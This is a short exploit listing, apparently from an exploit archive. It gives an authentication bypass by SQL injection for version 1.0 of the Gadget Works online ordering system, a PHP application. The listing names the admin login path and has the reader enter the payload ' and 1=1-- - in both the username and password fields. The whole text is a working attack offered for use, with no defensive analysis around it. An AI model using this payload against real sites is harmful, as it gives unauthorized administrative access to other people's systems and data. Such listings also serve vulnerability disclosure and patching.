Share
## https://sploitus.com/exploit?id=PACKETSTORM:162431
# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi  
# Date: 03/05/2021  
# Exploit Author: Richard Jones  
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
  
Steps:  
*Replace IP with the website IP  
  
1). Goto login page (http://IP/philosophy/admin/login.php?logout=1)  
2). For username and password enter for both fields the below payload and hit login.   
  
Payload:   
' and 1=1-- -